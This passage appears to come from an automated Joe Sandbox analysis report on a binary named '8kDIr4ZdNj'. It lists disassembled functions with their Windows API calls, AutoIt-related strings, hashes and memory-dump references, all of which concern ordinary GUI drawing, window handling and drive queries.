                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                        • API String ID: 2211948467-2373415609
                                                                        • Opcode ID: f98a1caa74aa967e2f9c000821a777865b984307f9f04b649996500da7bf867a
                                                                        • Instruction ID: fc79920c62129152e80fc69b7bd8ddc3b58cd96f83d05071164502b4bedbd861
                                                                        • Opcode Fuzzy Hash: f98a1caa74aa967e2f9c000821a777865b984307f9f04b649996500da7bf867a
                                                                        • Instruction Fuzzy Hash: 2C027071A14119EFDB14DFA8DC99EAEBBB9FF48310F048158F915AB2A1C770AD01DB60
                                                                        Function 0091356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,?,0091F910), ref: 00913627
                                                                        • IsWindowVisible.USER32(?), ref: 0091364B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpperVisibleWindow
                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                        • API String ID: 4105515805-45149045
                                                                        • Opcode ID: dc0f7e3f319e7a6ff5645b10b2f212ba9702e025614104363125207c9bb7f593
                                                                        • Instruction ID: 5ac21d6e46b117d6b7912e01454843065d91207df3af82cc50348d14e1a72263
                                                                        • Opcode Fuzzy Hash: dc0f7e3f319e7a6ff5645b10b2f212ba9702e025614104363125207c9bb7f593
                                                                        • Instruction Fuzzy Hash: A2D161303143059BCB14EF18C456AAE77E5FF95394F148868F8969B3A2DB31DE4ACB42
                                                                        Function 0091A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0091A630
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0091A661
                                                                        • GetSysColor.USER32(0000000F), ref: 0091A66D
                                                                        • SetBkColor.GDI32(?,000000FF), ref: 0091A687
                                                                        • SelectObject.GDI32(?,00000000), ref: 0091A696
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0091A6C1
                                                                        • GetSysColor.USER32(00000010), ref: 0091A6C9
                                                                        • CreateSolidBrush.GDI32(00000000), ref: 0091A6D0
                                                                        • FrameRect.USER32(?,?,00000000), ref: 0091A6DF
                                                                        • DeleteObject.GDI32(00000000), ref: 0091A6E6
                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0091A731
                                                                        • FillRect.USER32(?,?,00000000), ref: 0091A763
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0091A78E
                                                                          • Part of subcall function 0091A8CA: GetSysColor.USER32(00000012), ref: 0091A903
                                                                          • Part of subcall function 0091A8CA: SetTextColor.GDI32(?,?), ref: 0091A907
                                                                          • Part of subcall function 0091A8CA: GetSysColorBrush.USER32(0000000F), ref: 0091A91D
                                                                          • Part of subcall function 0091A8CA: GetSysColor.USER32(0000000F), ref: 0091A928
                                                                          • Part of subcall function 0091A8CA: GetSysColor.USER32(00000011), ref: 0091A945
                                                                          • Part of subcall function 0091A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0091A953
                                                                          • Part of subcall function 0091A8CA: SelectObject.GDI32(?,00000000), ref: 0091A964
                                                                          • Part of subcall function 0091A8CA: SetBkColor.GDI32(?,00000000), ref: 0091A96D
                                                                          • Part of subcall function 0091A8CA: SelectObject.GDI32(?,?), ref: 0091A97A
                                                                          • Part of subcall function 0091A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0091A999
                                                                          • Part of subcall function 0091A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0091A9B0
                                                                          • Part of subcall function 0091A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0091A9C5
                                                                          • Part of subcall function 0091A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0091A9ED
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 3521893082-0
                                                                        • Opcode ID: 36d1f9f8148e5277bb1482dd291b765f2804a251115c96b102794a8c7c1eed46
                                                                        • Instruction ID: 6ffc22d741baecccb0654f90491ee238ed107e19b14249bf8f39ac5e2c468c28
                                                                        • Opcode Fuzzy Hash: 36d1f9f8148e5277bb1482dd291b765f2804a251115c96b102794a8c7c1eed46
                                                                        • Instruction Fuzzy Hash: 95918E71619309FFCB119F64DC08AAB7BA9FF88321F104A29F962961E1D730D944DB52
                                                                        Function 009074AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(00000000), ref: 009074DE
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0090759D
                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009075DB
                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009075ED
                                                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00907633
                                                                        • GetClientRect.USER32(00000000,?), ref: 0090763F
                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00907683
                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00907692
                                                                        • GetStockObject.GDI32(00000011), ref: 009076A2
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 009076A6
                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009076B6
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009076BF
                                                                        • DeleteDC.GDI32(00000000), ref: 009076C8
                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009076F4
                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0090770B
                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00907746
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0090775A
                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0090776B
                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0090779B
                                                                        • GetStockObject.GDI32(00000011), ref: 009077A6
                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009077B1
                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009077BB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                        • API String ID: 2910397461-517079104
                                                                        • Opcode ID: 710222d9bbaf076cd677e8602c11da14014063efdb0716d1d2c8c83dec47657e
                                                                        • Instruction ID: f25352ff32183ec4f7724acba99fe35c733643d0fd88487e62c16e8e96e2cef4
                                                                        • Opcode Fuzzy Hash: 710222d9bbaf076cd677e8602c11da14014063efdb0716d1d2c8c83dec47657e
                                                                        • Instruction Fuzzy Hash: 9EA17171A14619BFEB14DBA8DC5AFAE7BB9EB04711F048114FA15E72E1C670AD00DB60
                                                                        Function 008FAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 008FAD1E
                                                                        • GetDriveTypeW.KERNEL32(?,0091FAC0,?,\\.\,0091F910), ref: 008FADFB
                                                                        • SetErrorMode.KERNEL32(00000000,0091FAC0,?,\\.\,0091F910), ref: 008FAF59
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$DriveType
                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                        • API String ID: 2907320926-4222207086
                                                                        • Opcode ID: a61aa22b3d1b8010ee702e034afa8dff18a66b3dd04d899d2be43141575e27ae
                                                                        • Instruction ID: 9852c96ae5c7f3e15de6b89b811711bcc639a32b0e791e139ef85fbc29807f36
                                                                        • Opcode Fuzzy Hash: a61aa22b3d1b8010ee702e034afa8dff18a66b3dd04d899d2be43141575e27ae
                                                                        • Instruction Fuzzy Hash: B551B9F065420DEB8B18EB34D952CBE73E4FB487287244056E60BEB291DE719D41D763
                                                                        Function 008968DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                        • API String ID: 1038674560-86951937
                                                                        • Opcode ID: 86c28e64b7ad6cb5d562400f640dea7f23c48420e6c3cb7519c06733b80c4e28
                                                                        • Instruction ID: a4dfed875be1bee3b5dfe641acfdcb9f8f9358aa439d09ca91dac43bbdfc72ab
                                                                        • Opcode Fuzzy Hash: 86c28e64b7ad6cb5d562400f640dea7f23c48420e6c3cb7519c06733b80c4e28
                                                                        • Instruction Fuzzy Hash: 768117B16402196ACF21BB64EC42FAF37A8FF05714F080025F906EA296FF70DA65D656
                                                                        Function 00919A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00919AD2
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00919B8B
                                                                        • SendMessageW.USER32(?,00001102,00000002,?), ref: 00919BA7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window
                                                                        • String ID: 0
                                                                        • API String ID: 2326795674-4108050209
                                                                        • Opcode ID: a2bf8d235685e825aa9e6d13a7d0f4de1296203ee13d4c0a81052c368b62fca5
                                                                        • Instruction ID: 5cea27083ec26e9e6a19d5e08ddccf74b986c5bf9382f04ee5671f219914dce8
                                                                        • Opcode Fuzzy Hash: a2bf8d235685e825aa9e6d13a7d0f4de1296203ee13d4c0a81052c368b62fca5
                                                                        • Instruction Fuzzy Hash: 5102AD30308309AFD715CF15C868BEABBE9FF49314F04892DF599962A1C734D985DB92
                                                                        Function 0091A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSysColor.USER32(00000012), ref: 0091A903
                                                                        • SetTextColor.GDI32(?,?), ref: 0091A907
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0091A91D
                                                                        • GetSysColor.USER32(0000000F), ref: 0091A928
                                                                        • CreateSolidBrush.GDI32(?), ref: 0091A92D
                                                                        • GetSysColor.USER32(00000011), ref: 0091A945
                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0091A953
                                                                        • SelectObject.GDI32(?,00000000), ref: 0091A964
                                                                        • SetBkColor.GDI32(?,00000000), ref: 0091A96D
                                                                        • SelectObject.GDI32(?,?), ref: 0091A97A
                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0091A999
                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0091A9B0
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0091A9C5
                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0091A9ED
                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0091AA14
                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0091AA32
                                                                        • DrawFocusRect.USER32(?,?), ref: 0091AA3D
                                                                        • GetSysColor.USER32(00000011), ref: 0091AA4B
                                                                        • SetTextColor.GDI32(?,00000000), ref: 0091AA53
                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0091AA67
                                                                        • SelectObject.GDI32(?,0091A5FA), ref: 0091AA7E
                                                                        • DeleteObject.GDI32(?), ref: 0091AA89
                                                                        • SelectObject.GDI32(?,?), ref: 0091AA8F
                                                                        • DeleteObject.GDI32(?), ref: 0091AA94
                                                                        • SetTextColor.GDI32(?,?), ref: 0091AA9A
                                                                        • SetBkColor.GDI32(?,?), ref: 0091AAA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                        • String ID:
                                                                        • API String ID: 1996641542-0
                                                                        • Opcode ID: 66359dd5145d4e2ba14d7ca1e07b7dfb212f6ca5d347280fbe87d426a3584081
                                                                        • Instruction ID: bb85ed89ddfa79cdb9cfccf7e45d616f80cc0f25da2300d76165d37343f991eb
                                                                        • Opcode Fuzzy Hash: 66359dd5145d4e2ba14d7ca1e07b7dfb212f6ca5d347280fbe87d426a3584081
                                                                        • Instruction Fuzzy Hash: 57513B71A0520CFFDF119FA4DC48AEE7B79EF08320F218625F915AB2A1D7759940DB90
                                                                        Function 009189D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00918AC1
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00918AD2
                                                                        • CharNextW.USER32(0000014E), ref: 00918B01
                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00918B42
                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00918B58
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00918B69
                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00918B86
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00918BD8
                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00918BEE
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00918C1F
                                                                        • _memset.LIBCMT ref: 00918C44
                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00918C8D
                                                                        • _memset.LIBCMT ref: 00918CEC
                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00918D16
                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00918D6E
                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00918E1B
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00918E3D
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00918E87
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00918EB4
                                                                        • DrawMenuBar.USER32(?), ref: 00918EC3
                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00918EEB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                        • String ID: 0
                                                                        • API String ID: 1073566785-4108050209
                                                                        • Opcode ID: 48ba60dd9516cd425942fbb50af8fc2def28d04b092e084f119f6e29542fbd1c
                                                                        • Instruction ID: 44c6c5483250c501d19c31d638ed4c2dcd93d08e971d7b57cc1fc53641244738
                                                                        • Opcode Fuzzy Hash: 48ba60dd9516cd425942fbb50af8fc2def28d04b092e084f119f6e29542fbd1c
                                                                        • Instruction Fuzzy Hash: 7CE16D70A0421CABDB20DF64CC84EEF7BB9FF09750F10815AF915AA291DB748981EF61
                                                                        Function 0091488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 009149CA
                                                                        • GetDesktopWindow.USER32 ref: 009149DF
                                                                        • GetWindowRect.USER32(00000000), ref: 009149E6
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00914A48
                                                                        • DestroyWindow.USER32(?), ref: 00914A74
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00914A9D
                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00914ABB
                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00914AE1
                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00914AF6
                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00914B09
                                                                        • IsWindowVisible.USER32(?), ref: 00914B29
                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00914B44
                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00914B58
                                                                        • GetWindowRect.USER32(?,?), ref: 00914B70
                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00914B96
                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 00914BB0
                                                                        • CopyRect.USER32(?,?), ref: 00914BC7
                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00914C32
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                        • String ID: ($0$tooltips_class32
                                                                        • API String ID: 698492251-4156429822
                                                                        • Opcode ID: 470d1389f69075318f2500e8daaa8e3b91f0ab9f19a4d22965b5162bd2e93b83
                                                                        • Instruction ID: 91668b106f368c349aaf25b1ef3a7ddff79cba56252571cfcedf78def98ddeb3
                                                                        • Opcode Fuzzy Hash: 470d1389f69075318f2500e8daaa8e3b91f0ab9f19a4d22965b5162bd2e93b83
                                                                        • Instruction Fuzzy Hash: 4CB18A71708344AFDB04DF68C845BAABBE8FF88714F00891CF5999B2A1D771E845CB96
                                                                        Function 008F449A Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 179COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 008F44AC
                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 008F44D2
                                                                        • _wcscpy.LIBCMT ref: 008F4500
                                                                        • _wcscmp.LIBCMT ref: 008F450B
                                                                        • _wcscat.LIBCMT ref: 008F4521
                                                                        • _wcsstr.LIBCMT ref: 008F452C
                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 008F4548
                                                                        • _wcscat.LIBCMT ref: 008F4591
                                                                        • _wcscat.LIBCMT ref: 008F4598
                                                                        • _wcsncpy.LIBCMT ref: 008F45C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                        • API String ID: 699586101-1459072770
                                                                        • Opcode ID: 7c8d1d7395a20b378af89a1432558324b8dc40fd8300f992e43c6473dec55d9c
                                                                        • Instruction ID: e7f7dc01fd3b6e9e0a9496900be8beb0156b73d60657836b2f241b90dcc458d8
                                                                        • Opcode Fuzzy Hash: 7c8d1d7395a20b378af89a1432558324b8dc40fd8300f992e43c6473dec55d9c
                                                                        • Instruction Fuzzy Hash: 7441DA3164020D7BEB10BB788C47EFF77ACFF46710F144566FA05E6282EA749A0196A6
                                                                        Function 008927D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008928BC
                                                                        • GetSystemMetrics.USER32(00000007), ref: 008928C4
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 008928EF
                                                                        • GetSystemMetrics.USER32(00000008), ref: 008928F7
                                                                        • GetSystemMetrics.USER32(00000004), ref: 0089291C
